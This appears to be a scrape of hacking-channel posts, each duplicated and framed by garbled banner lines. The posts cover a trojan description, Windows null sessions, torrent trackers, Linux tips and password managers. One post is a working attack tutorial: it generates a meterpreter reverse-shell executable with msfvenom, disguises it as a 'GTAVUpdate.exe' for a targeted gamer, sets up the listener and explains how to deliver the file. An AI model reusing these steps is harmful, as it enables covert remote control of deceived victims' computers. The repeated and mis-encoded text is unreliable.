β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Apk error install fix :
Corrupted files
Not enough storage
Insufficient system permissions
Unsigned App
Incompatible version
Solving App Not Installed Error
Changing the app codes
Resetting the app preferences
Disabling Google Play protect
Avoid installation from the sd-cards
Clearing Data
Signing App
Unknown source installation
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Apk error install fix :
Corrupted files
Not enough storage
Insufficient system permissions
Unsigned App
Incompatible version
Solving App Not Installed Error
Changing the app codes
Resetting the app preferences
Disabling Google Play protect
Avoid installation from the sd-cards
Clearing Data
Signing App
Unknown source installation
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Analytiques
a Trojan has been detected that can change proxy settings and intercept HTTPS traffic :
HOW IT WORK'S ?
1) Microsoft experts have warned about the emergence of a new Trojan capable of modifying proxy server settings, "listening" to encrypted traffic, stealing credentials, and other important information.
2) To spread the malware dubbed Trojan: JS / Certor.A., Cybercriminals usetraditional methods, in particular, spam mailing. Emails include a Microsoft Word document attachment that contains an embedded OLE object that runs a Jscript when opened. This script is disguised as a harmless file that does not arouse the user's suspicion. In fact, the code contains several PowerShell scripts and its own certificate, which is then used to monitor and intercept HTTPS traffic.
3) Once on the system, the malware modifies Internet Explorer proxy settings in the Windows registry and installs a Tor client, a task scheduler, a proxy tunneling utility,
and a certificate that allows attackers to listen to encrypted traffic. In addition, the Trojan installs another certificate for the Mozilla Firefox browser, since this Internet browser uses its own proxy settings.
4) Further, all traffic is redirected to a proxy server controlled by the attacker. As a result, they can remotely monitor, redirect, modify traffic and steal important victim data.
Don't copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Analytiques
a Trojan has been detected that can change proxy settings and intercept HTTPS traffic :
HOW IT WORK'S ?
1) Microsoft experts have warned about the emergence of a new Trojan capable of modifying proxy server settings, "listening" to encrypted traffic, stealing credentials, and other important information.
2) To spread the malware dubbed Trojan: JS / Certor.A., Cybercriminals usetraditional methods, in particular, spam mailing. Emails include a Microsoft Word document attachment that contains an embedded OLE object that runs a Jscript when opened. This script is disguised as a harmless file that does not arouse the user's suspicion. In fact, the code contains several PowerShell scripts and its own certificate, which is then used to monitor and intercept HTTPS traffic.
3) Once on the system, the malware modifies Internet Explorer proxy settings in the Windows registry and installs a Tor client, a task scheduler, a proxy tunneling utility,
and a certificate that allows attackers to listen to encrypted traffic. In addition, the Trojan installs another certificate for the Mozilla Firefox browser, since this Internet browser uses its own proxy settings.
4) Further, all traffic is redirected to a proxy server controlled by the attacker. As a result, they can remotely monitor, redirect, modify traffic and steal important victim data.
Don't copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is ipc$
1) IPC$ (Internet Process Connection) is a resource that shares "named pipes". It is a named pipe that is opened for inter-process communication.
2) By providing a trusted user name and password, both parties of the connection can establish a secure channel and proceed with this channel. Encrypted data exchange to achieve access to remote computers. IPC$ is a new feature of NT/2000. It has a feature that only one connection can be established between two IPs at the same time.
3) While NT/2000 provides the ipc$ function, it also opens the default sharing when the system is first installed, that is, all logical sharing (c$, d$, e$...) and the system directory winnt or windows (admin$) shared. All of these, Microsoft's original intention is to facilitate the management of administrators, but intentionally or unintentionally, leading to a reduction in system security.
4) We can always hear people talking about ipc$ loopholes and ipc$ loopholes. In fact, ipc$ is not a loophole in the real sense. I think the reason why some people say this must refer to the "backdoor" that Microsoft installed itself: empty Session (Null session).
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is ipc$
1) IPC$ (Internet Process Connection) is a resource that shares "named pipes". It is a named pipe that is opened for inter-process communication.
2) By providing a trusted user name and password, both parties of the connection can establish a secure channel and proceed with this channel. Encrypted data exchange to achieve access to remote computers. IPC$ is a new feature of NT/2000. It has a feature that only one connection can be established between two IPs at the same time.
3) While NT/2000 provides the ipc$ function, it also opens the default sharing when the system is first installed, that is, all logical sharing (c$, d$, e$...) and the system directory winnt or windows (admin$) shared. All of these, Microsoft's original intention is to facilitate the management of administrators, but intentionally or unintentionally, leading to a reduction in system security.
4) We can always hear people talking about ipc$ loopholes and ipc$ loopholes. In fact, ipc$ is not a loophole in the real sense. I think the reason why some people say this must refer to the "backdoor" that Microsoft installed itself: empty Session (Null session).
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is an empty session ?
Before introducing the empty session, we need to understand how a secure session is established.
In Windows NT 4.0, a challenge response protocol is used to establish a session with a remote machine. The successful session will become a secure tunnel through which the two parties can exchange information. The general sequence of this process is as follows:
1) The session requester (client) sends a data packet to the session receiver (server) to request the establishment of a secure tunnel;
2) The server generates a random 64-digit number (implementation challenge) and sends it back to the client;
3) The client obtains the 64-digit number generated by the server, disrupts it with the password of the account that is trying to establish a session, and returns the result to the server (response);
4) After the server accepts the response, it sends it to the local security authentication (LSA). The LSA verifies the response by using the user's correct password to confirm the identity of the requester. If the account of the requester is a local account of the server, the verification occurs locally; if the account requested is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and then sent to the client. The client uses this access token to connect to the resource on the server until the proposed session is terminated.
The above is a general process of establishing a secure session, but what about an empty session?
A null session is a session established with the server without trust (that is, the user name and password are not provided), but according to the WIN2000 access control model, the establishment of a null session also requires a token, but the null session is in the process of establishing It has not been authenticated by user information, so this token does not contain user information. Therefore, this session cannot allow the system to send encrypted information, but this does not mean that the token of the empty session does not contain the security identifier SID (it identifies For an empty session, the SID of the token provided by LSA is S-1-5-7, which is the SID of the empty session, and the user name is: ANONYMOUS LOGON
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is an empty session ?
Before introducing the empty session, we need to understand how a secure session is established.
In Windows NT 4.0, a challenge response protocol is used to establish a session with a remote machine. The successful session will become a secure tunnel through which the two parties can exchange information. The general sequence of this process is as follows:
1) The session requester (client) sends a data packet to the session receiver (server) to request the establishment of a secure tunnel;
2) The server generates a random 64-digit number (implementation challenge) and sends it back to the client;
3) The client obtains the 64-digit number generated by the server, disrupts it with the password of the account that is trying to establish a session, and returns the result to the server (response);
4) After the server accepts the response, it sends it to the local security authentication (LSA). The LSA verifies the response by using the user's correct password to confirm the identity of the requester. If the account of the requester is a local account of the server, the verification occurs locally; if the account requested is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and then sent to the client. The client uses this access token to connect to the resource on the server until the proposed session is terminated.
The above is a general process of establishing a secure session, but what about an empty session?
A null session is a session established with the server without trust (that is, the user name and password are not provided), but according to the WIN2000 access control model, the establishment of a null session also requires a token, but the null session is in the process of establishing It has not been authenticated by user information, so this token does not contain user information. Therefore, this session cannot allow the system to send encrypted information, but this does not mean that the token of the empty session does not contain the security identifier SID (it identifies For an empty session, the SID of the token provided by LSA is S-1-5-7, which is the SID of the empty session, and the user name is: ANONYMOUS LOGON
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack Windows 10 with Metasploit :
1) Create metasploit
Before creating the metasploit, we need to figure out what is our Kali Linux local IP.
For that, run
2) Now letβs get hands dirty!
In the terminal run the follow command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 βplatform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe
3) The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.
The name of the .exe is up to you. In this case Iβll be using GTAVUpdate.exe because our target will be a gamer that we know has GTA V.
4) Connection
We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal
5) First, weβll tell Metasploit to use the generic payload handler βmulti/handlerβ using the command
6) If everythingβs ok type run or exploit
On the Windows machine you just need to access via the browser the IP/File.exe
In our case is 192.168.192.72/GTAVUpdate.exe
source https://medium.com/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack Windows 10 with Metasploit :
1) Create metasploit
Before creating the metasploit, we need to figure out what is our Kali Linux local IP.
For that, run
ip addror
ifconfig
2) Now letβs get hands dirty!
In the terminal run the follow command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 βplatform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe
3) The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.
The name of the .exe is up to you. In this case Iβll be using GTAVUpdate.exe because our target will be a gamer that we know has GTA V.
4) Connection
We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal
5) First, weβll tell Metasploit to use the generic payload handler βmulti/handlerβ using the command
use multi/handler. We will then set the payload to match the one set within the executable using the command
set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way β
set LHOST 192.168.195.72and set
LPORT 4444. Once done, type
runor ```exploit```and press Enter.
6) If everythingβs ok type run or exploit
On the Windows machine you just need to access via the browser the IP/File.exe
In our case is 192.168.192.72/GTAVUpdate.exe
source https://medium.com/
β β β Uππ»βΊπ«Δπ¬πβ β β β
Medium
Medium: Read and write stories.
On Medium, anyone can share insightful perspectives, useful knowledge, and life wisdom with the world.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FULL LIST OF TORRENTS TRACKERS FOR SPEED !
https://220.162.244.175:53880/announce
https://www.ipmart-forum.com:2710/announce
https://tracker2.istole.it:60500/announce
https://tracker.deluxebits.to:3552/announce
udp://coppersurfer.tk:6969/announce
udp://tracker.prq.to/announce
udp://tracker.btzoo.eu:80/announce
https://tracker.torrentbox.com:2710/announce
https://tracker.hexagon.cc:2710/announce
https://tracker.torrent.to:2710/announce
https://axxo.sladinki007.net:6500/announce
https://www.torrent-downloads.to:2710/announce
udp://9.rarbg.com:2710/announce
https://inferno.demonoid.com:3400/announce
https://tracker.prq.to/announce
https://tracker.torrenty.org:6969/announce
https://tpb.tracker.thepiratebay.org/announce
https://t.ppnow.net:2710/announce
https://tracker.paradise-tracker.com:12000/announce
https://www.torrentvideos.com:6969/announce
https://tracker.sladinki007.net:6500/announce
https://tracker.bitebbs.com:6969/announce
udp://tracker.opentrackr.org:1337/announce
udp://tracker.openbittorrent.com:80
udp://tracker.publicbt.com:80
udp://tracker.istole.it:80
udp://tracker.btzoo.eu:80/announce
https://opensharing.org:2710/announce
udp://open.demonii.com:1337/announce
https://announce.torrentsmd.com:8080/announce.php
https://announce.torrentsmd.com:6969/announce
https://bt.careland.com.cn:6969/announce
https://i.bandito.org/announce
https://bttrack.9you.com/announce
udp://coppersurfer.tk:6969/announce
https://tracker.pubt.net:2710/announce
udp://glotorrents.pw:6969/announce
udp://tracker.pomf.se/announce
udp://9.rarbg.com:2710/announce
udp://tracker.istole.it:80/announce
udp://tracker.publicbt.com:80/announce
udp://open.demonii.com:1337/announce
udp://p4p.arenabg.ch:1337/announce
udp://tracker.openbittorrent.com:80/announce
udp://tracker4.piratux.com:6969/announce
udp://open.demonii.com:1337/announce
https://bt1.the9.com:6969/announce
https://tracker.ydy.com:102/announce
udp://tracker.blackunicorn.xyz:6969/announce
udp://inferno.demonoid.ph:3389/announce
https://eztv.sladinki007.eu:60500/announce
https://moviesb4time.biz/announce.php
https://tracker.deadfrog.us:42426/announce
https://mpggalaxy.mine.nu:6969/announce
https://www.sumotracker.org/announce
https://9.rarbg.com:2710/announce
https://mgtracker.org:2710/announce
https://announce.torrentsmd.com:6969/announce
https://bt.careland.com.cn:6969/announce
https://explodie.org:6969/announce
https://tracker1.wasabii.com.tw:6969/announce
https://tracker.best-torrents.net:6969/announce
https://tracker.tfile.me/announce
udp://tracker.publicbt.com:80/announce
https://tracker.torrenty.org:6969/announce
udp://tracker.openbittorrent.com:80/announce
udp://9.rarbg.com:2710/announce
udp://explodie.org:6969/announce
udp://coppersurfer.tk:6969/announce
udp://tracker.openbittorrent.com:80/announce
udp://11.rarbg.com:80/announce
udp://tracker.openbittorrent.com:80
udp://exodus.desync.com:6969/announce
udp://tracker.istole.it:80/announce
udp://tracker.openbittorrent.com:80/announce
https://denis.stalker.h3q.com:6969/announce
udp://9.rarbg.me:2710/announce
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦FULL LIST OF TORRENTS TRACKERS FOR SPEED !
https://220.162.244.175:53880/announce
https://www.ipmart-forum.com:2710/announce
https://tracker2.istole.it:60500/announce
https://tracker.deluxebits.to:3552/announce
udp://coppersurfer.tk:6969/announce
udp://tracker.prq.to/announce
udp://tracker.btzoo.eu:80/announce
https://tracker.torrentbox.com:2710/announce
https://tracker.hexagon.cc:2710/announce
https://tracker.torrent.to:2710/announce
https://axxo.sladinki007.net:6500/announce
https://www.torrent-downloads.to:2710/announce
udp://9.rarbg.com:2710/announce
https://inferno.demonoid.com:3400/announce
https://tracker.prq.to/announce
https://tracker.torrenty.org:6969/announce
https://tpb.tracker.thepiratebay.org/announce
https://t.ppnow.net:2710/announce
https://tracker.paradise-tracker.com:12000/announce
https://www.torrentvideos.com:6969/announce
https://tracker.sladinki007.net:6500/announce
https://tracker.bitebbs.com:6969/announce
udp://tracker.opentrackr.org:1337/announce
udp://tracker.openbittorrent.com:80
udp://tracker.publicbt.com:80
udp://tracker.istole.it:80
udp://tracker.btzoo.eu:80/announce
https://opensharing.org:2710/announce
udp://open.demonii.com:1337/announce
https://announce.torrentsmd.com:8080/announce.php
https://announce.torrentsmd.com:6969/announce
https://bt.careland.com.cn:6969/announce
https://i.bandito.org/announce
https://bttrack.9you.com/announce
udp://coppersurfer.tk:6969/announce
https://tracker.pubt.net:2710/announce
udp://glotorrents.pw:6969/announce
udp://tracker.pomf.se/announce
udp://9.rarbg.com:2710/announce
udp://tracker.istole.it:80/announce
udp://tracker.publicbt.com:80/announce
udp://open.demonii.com:1337/announce
udp://p4p.arenabg.ch:1337/announce
udp://tracker.openbittorrent.com:80/announce
udp://tracker4.piratux.com:6969/announce
udp://open.demonii.com:1337/announce
https://bt1.the9.com:6969/announce
https://tracker.ydy.com:102/announce
udp://tracker.blackunicorn.xyz:6969/announce
udp://inferno.demonoid.ph:3389/announce
https://eztv.sladinki007.eu:60500/announce
https://moviesb4time.biz/announce.php
https://tracker.deadfrog.us:42426/announce
https://mpggalaxy.mine.nu:6969/announce
https://www.sumotracker.org/announce
https://9.rarbg.com:2710/announce
https://mgtracker.org:2710/announce
https://announce.torrentsmd.com:6969/announce
https://bt.careland.com.cn:6969/announce
https://explodie.org:6969/announce
https://tracker1.wasabii.com.tw:6969/announce
https://tracker.best-torrents.net:6969/announce
https://tracker.tfile.me/announce
udp://tracker.publicbt.com:80/announce
https://tracker.torrenty.org:6969/announce
udp://tracker.openbittorrent.com:80/announce
udp://9.rarbg.com:2710/announce
udp://explodie.org:6969/announce
udp://coppersurfer.tk:6969/announce
udp://tracker.openbittorrent.com:80/announce
udp://11.rarbg.com:80/announce
udp://tracker.openbittorrent.com:80
udp://exodus.desync.com:6969/announce
udp://tracker.istole.it:80/announce
udp://tracker.openbittorrent.com:80/announce
https://denis.stalker.h3q.com:6969/announce
udp://9.rarbg.me:2710/announce
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Speed torrents download tips :
1) Select torrents with enough seeds. Torrents with fewer "seeds" (uploaders) than "leeches" (downloaders) will take significantly longer to download than in the inverse
2) Close background services and programs when downloading. Running any programsβespecially those which take up large amounts of bandwidth, such as streaming servicesβwhile attempting to download torrents will invariably slow down your download rates.
3) Try downloading one torrent at a time. In the event that you're running into issues with torrent speed while downloading multiple torrents, try pausing all but one. This will allocate the bandwidth that the other two torrents were using to the one that isn't paused.
4) Prioritize a specific torrent. If you're downloading more than one torrent, you can set its priority to "High" in order to cause it to download faster than the other torrents in your queue:
-Right-click a torrent.
-Hover your mouse over Bandwidth Allocation.
-Click High
5) Avoid downloading other files when downloading a torrent. Again, running streaming programs and file-sharing programs other than your torrent client will prevent your torrents from downloading in a timely fashion.
6) Download during periods of low activity. This goes for both inside of your house and in general: try to download late at night or early in the morning during a period where you know that anyone else on your Internet connection isn't also downloading or streaming.
7) connect your computer to your router via Ethernet. Using an Ethernet cable to connect your computer to your router will ensure that there aren't any hiccups in your download speed.
8) Use a VPN when downloading torrents. If your ISP is throttling your Internet speed because they don't approve of you downloading torrents, using a VPN will help you circumvent the restrictions.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Speed torrents download tips :
1) Select torrents with enough seeds. Torrents with fewer "seeds" (uploaders) than "leeches" (downloaders) will take significantly longer to download than in the inverse
2) Close background services and programs when downloading. Running any programsβespecially those which take up large amounts of bandwidth, such as streaming servicesβwhile attempting to download torrents will invariably slow down your download rates.
3) Try downloading one torrent at a time. In the event that you're running into issues with torrent speed while downloading multiple torrents, try pausing all but one. This will allocate the bandwidth that the other two torrents were using to the one that isn't paused.
4) Prioritize a specific torrent. If you're downloading more than one torrent, you can set its priority to "High" in order to cause it to download faster than the other torrents in your queue:
-Right-click a torrent.
-Hover your mouse over Bandwidth Allocation.
-Click High
5) Avoid downloading other files when downloading a torrent. Again, running streaming programs and file-sharing programs other than your torrent client will prevent your torrents from downloading in a timely fashion.
6) Download during periods of low activity. This goes for both inside of your house and in general: try to download late at night or early in the morning during a period where you know that anyone else on your Internet connection isn't also downloading or streaming.
7) connect your computer to your router via Ethernet. Using an Ethernet cable to connect your computer to your router will ensure that there aren't any hiccups in your download speed.
8) Use a VPN when downloading torrents. If your ISP is throttling your Internet speed because they don't approve of you downloading torrents, using a VPN will help you circumvent the restrictions.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to find out the last modified date of a file on Linux
1) Using stat command
The ls -l command gives you basic information about a file, such as file ownership and permissions, file size and creation date.
The stat command returns the attributes of a file with detailed information, such as when the file was last opened and modified.
The syntax is pretty straightforward.
Stat is followed by the file name or full path to this file.
$ stat filename
2) From the The -c option is used to return the date in a custom format, and the "% y" flag displays the time it was last modified.
output, we can clearly see when the file was last accessed (Access Date), Modified Date, Modified Date of other parameters.
If you want to view only the modified date and omit all other information, run the following command:
$ stat -c '% y' file1.txt
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to find out the last modified date of a file on Linux
1) Using stat command
The ls -l command gives you basic information about a file, such as file ownership and permissions, file size and creation date.
The stat command returns the attributes of a file with detailed information, such as when the file was last opened and modified.
The syntax is pretty straightforward.
Stat is followed by the file name or full path to this file.
$ stat filename
2) From the The -c option is used to return the date in a custom format, and the "% y" flag displays the time it was last modified.
output, we can clearly see when the file was last accessed (Access Date), Modified Date, Modified Date of other parameters.
If you want to view only the modified date and omit all other information, run the following command:
$ stat -c '% y' file1.txt
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do password managers work?
#ForBeginers
1) Password Manager saves all user access codes. At the same time, he needs to remember only one master password in order to enter such a figurative notebook with notes. There is no need to be afraid that someone will crack this code and gain access to all accounts at the same time. Just choose a strong master password that you haven't used anywhere else.
2) AES encryption is responsible for data security , so the key length is 256 bits and cannot be cracked. Unlocking such a master password is possible only if the code is entered correctly.
3) Among the managers there are those who work in online or offline modes. The online manager encrypts logins and passwords on their servers. Some services automatically enter passwords on sites (this requires a browser extension). The program synchronizes codes from a computer, smartphone, tablet and other user devices.
4) A few reminders to create passwords
With a password manager, you can do everything according to the rules and not be afraid to forget something. The user is guessing the password. It is desirable that it should consist of at least 10 characters and contain a variety of letters and signs. Passwords need to be changed from time to time.
5) Safeguarding data
One of the most reliable password managers is MultiPassword ( official site ). The program uses several encryption technologies simultaneously: AES-256, RSA, HKDF, PBKDF2. The encryption and decryption processes occur exclusively on the user's device, so even the developers of the utility cannot gain access to the data.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do password managers work?
#ForBeginers
1) Password Manager saves all user access codes. At the same time, he needs to remember only one master password in order to enter such a figurative notebook with notes. There is no need to be afraid that someone will crack this code and gain access to all accounts at the same time. Just choose a strong master password that you haven't used anywhere else.
2) AES encryption is responsible for data security , so the key length is 256 bits and cannot be cracked. Unlocking such a master password is possible only if the code is entered correctly.
3) Among the managers there are those who work in online or offline modes. The online manager encrypts logins and passwords on their servers. Some services automatically enter passwords on sites (this requires a browser extension). The program synchronizes codes from a computer, smartphone, tablet and other user devices.
4) A few reminders to create passwords
With a password manager, you can do everything according to the rules and not be afraid to forget something. The user is guessing the password. It is desirable that it should consist of at least 10 characters and contain a variety of letters and signs. Passwords need to be changed from time to time.
5) Safeguarding data
One of the most reliable password managers is MultiPassword ( official site ). The program uses several encryption technologies simultaneously: AES-256, RSA, HKDF, PBKDF2. The encryption and decryption processes occur exclusively on the user's device, so even the developers of the utility cannot gain access to the data.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ASTRA LINUX TIPS :
π§ How to use Sudo when used with Output Redirection or Pipe ?
1) Use sudo with tree
For example, to redirect the output from echo 1 to ip_forward, run:
$ sudo echo 1> / proc / sys / net / ipv4 / ip_forward
bash: / proc / sys / net / ipv4 / ip_forward: Permission denied
2) The above sudo command resulted in a permission denied error because the redirection is done by a shell that does not have write permission.
We can use the sudo command with the tee command to fix this error:
$ echo 1 | sudo tee / proc / sys / net / ipv4 / ip_forward
3) With the approach described above, the command executed before the pipe will not be executed as the root user (echo 1).
4) This is useful if you just want the output of a program that does not require root privileges.
If the command before the pipe requires root, we could use sudo before each command, for example:
$ sudo echo 1 | sudo tee / proc / sys / net / ipv4 / ip_forward> / dev / null
5) A similar approach that we can use to write "1" to the "ip_forward" file as in the previous examples is to level up the write process to the file.
π¦Here's an example:
$ sudo tee / proc / sys / net / ipv4 / ip_forward> / dev / null << EOF
EOF
6) Start the shell with sudo -c
Another popular approach is to start another shell as root with the -c option.
π¦Example:
$ sudo sh -c 'echo 1> / proc / sys / net / ipv4 / ip_forward'
Start the shell with sudo -s
Another way is to start a shell with sudo -s and then execute the command:
$ sudo -s
# echo 1> / proc / sys / net / ipv4 / ip_forward
# ^ D
6) With a Bash script
Another way to run sudo with a redirect or pipe is to create a bash script with all your commands and run that script with sudo.
Let's see how we can implement this.
7) First, we need to create a new file using any text editor like nano, vim, gedit or whatever.
Let's call it myscript.sh.
8) Then paste the following commands into myscript.sh and save the file:
#! / bin / sh
echo 1> / proc / sys / net / ipv4 / ip_forward
Now you just need to run the myscript.sh file using the sudo command:
$ sudo myscript.sh
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ASTRA LINUX TIPS :
π§ How to use Sudo when used with Output Redirection or Pipe ?
1) Use sudo with tree
For example, to redirect the output from echo 1 to ip_forward, run:
$ sudo echo 1> / proc / sys / net / ipv4 / ip_forward
bash: / proc / sys / net / ipv4 / ip_forward: Permission denied
2) The above sudo command resulted in a permission denied error because the redirection is done by a shell that does not have write permission.
We can use the sudo command with the tee command to fix this error:
$ echo 1 | sudo tee / proc / sys / net / ipv4 / ip_forward
3) With the approach described above, the command executed before the pipe will not be executed as the root user (echo 1).
4) This is useful if you just want the output of a program that does not require root privileges.
If the command before the pipe requires root, we could use sudo before each command, for example:
$ sudo echo 1 | sudo tee / proc / sys / net / ipv4 / ip_forward> / dev / null
5) A similar approach that we can use to write "1" to the "ip_forward" file as in the previous examples is to level up the write process to the file.
π¦Here's an example:
$ sudo tee / proc / sys / net / ipv4 / ip_forward> / dev / null << EOF
EOF
6) Start the shell with sudo -c
Another popular approach is to start another shell as root with the -c option.
π¦Example:
$ sudo sh -c 'echo 1> / proc / sys / net / ipv4 / ip_forward'
Start the shell with sudo -s
Another way is to start a shell with sudo -s and then execute the command:
$ sudo -s
# echo 1> / proc / sys / net / ipv4 / ip_forward
# ^ D
6) With a Bash script
Another way to run sudo with a redirect or pipe is to create a bash script with all your commands and run that script with sudo.
Let's see how we can implement this.
7) First, we need to create a new file using any text editor like nano, vim, gedit or whatever.
Let's call it myscript.sh.
8) Then paste the following commands into myscript.sh and save the file:
#! / bin / sh
echo 1> / proc / sys / net / ipv4 / ip_forward
Now you just need to run the myscript.sh file using the sudo command:
$ sudo myscript.sh
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How secure li nux from malwares ?
1) Beware of the
emergence of Linux virus at the beginning of Linux. Due to its original excellent design, it seems to have innate virus immunity. At that time, many people believed that there would not be a virus against Linux, but Linux is no exception. In the autumn of 1996, an organization called VLAD in Australia wrote Staog, which is said to be the first virus under Linux, in assembly language. It specifically infects binary files and tries to obtain root permissions in three ways. Of course, the Staog virus is designed to demonstrate and prove that Linux is potentially dangerous to be infected by the virus. It does not perform any damage to the infected system.
2) Grasp the weaknesses. Everyone who breaks
Linux may have heard of or even encountered some Linux viruses. The principles and symptoms of these Linux viruses are different, so the prevention methods they take are also different. In order to better prevent Linux viruses, we first classify some known Linux viruses.
From the current appearance of Linux viruses, it can be summarized into the following virus types:
A) Viruses that infect ELF format files
This type of virus uses ELF format files as the main target of infection, and viruses that can infect ELF files can be written through compilation or C. Lindose virus is a virus that can infect ELF files. When it finds an ELF file, it will check whether the infected machine type is Intel80386. If it is, check whether there is a part of the file with a size greater than 2784 bytes (or hexadecimal AEO). If there is, the virus will overwrite it with its own code and add the code of the corresponding part of the host file, and the host The entry point of the file points to the virus code part.
B) Script viruses
Script viruses refer to viruses written in script languages ββsuch as shell. This type of virus is relatively simple to write and does not require high-level knowledge. It is easy to damage the system, such as deleting files, disrupting the normal operation of the system, or even downloading and installing Trojan horses. But it is not very spreading, and usually causes damage on the machine.
Prevention: To prevent such viruses, you must also be careful not to run scripts of unknown origin, and at the same time, strictly control the use of root permissions.
Worm virus
The worm virus under Linux is similar to the worm virus under Windows. It can run independently and spread itself to other computers.
Worms under the Linux platform usually use vulnerabilities in some Linux systems and services to spread. For example, the Ramen virus uses the rpc.statd and wu-ftp security of certain versions of Linux (Redhat6.2 and 7.0) The vulnerability is spread.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How secure li nux from malwares ?
1) Beware of the
emergence of Linux virus at the beginning of Linux. Due to its original excellent design, it seems to have innate virus immunity. At that time, many people believed that there would not be a virus against Linux, but Linux is no exception. In the autumn of 1996, an organization called VLAD in Australia wrote Staog, which is said to be the first virus under Linux, in assembly language. It specifically infects binary files and tries to obtain root permissions in three ways. Of course, the Staog virus is designed to demonstrate and prove that Linux is potentially dangerous to be infected by the virus. It does not perform any damage to the infected system.
2) Grasp the weaknesses. Everyone who breaks
Linux may have heard of or even encountered some Linux viruses. The principles and symptoms of these Linux viruses are different, so the prevention methods they take are also different. In order to better prevent Linux viruses, we first classify some known Linux viruses.
From the current appearance of Linux viruses, it can be summarized into the following virus types:
A) Viruses that infect ELF format files
This type of virus uses ELF format files as the main target of infection, and viruses that can infect ELF files can be written through compilation or C. Lindose virus is a virus that can infect ELF files. When it finds an ELF file, it will check whether the infected machine type is Intel80386. If it is, check whether there is a part of the file with a size greater than 2784 bytes (or hexadecimal AEO). If there is, the virus will overwrite it with its own code and add the code of the corresponding part of the host file, and the host The entry point of the file points to the virus code part.
B) Script viruses
Script viruses refer to viruses written in script languages ββsuch as shell. This type of virus is relatively simple to write and does not require high-level knowledge. It is easy to damage the system, such as deleting files, disrupting the normal operation of the system, or even downloading and installing Trojan horses. But it is not very spreading, and usually causes damage on the machine.
Prevention: To prevent such viruses, you must also be careful not to run scripts of unknown origin, and at the same time, strictly control the use of root permissions.
Worm virus
The worm virus under Linux is similar to the worm virus under Windows. It can run independently and spread itself to other computers.
Worms under the Linux platform usually use vulnerabilities in some Linux systems and services to spread. For example, the Ramen virus uses the rpc.statd and wu-ftp security of certain versions of Linux (Redhat6.2 and 7.0) The vulnerability is spread.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β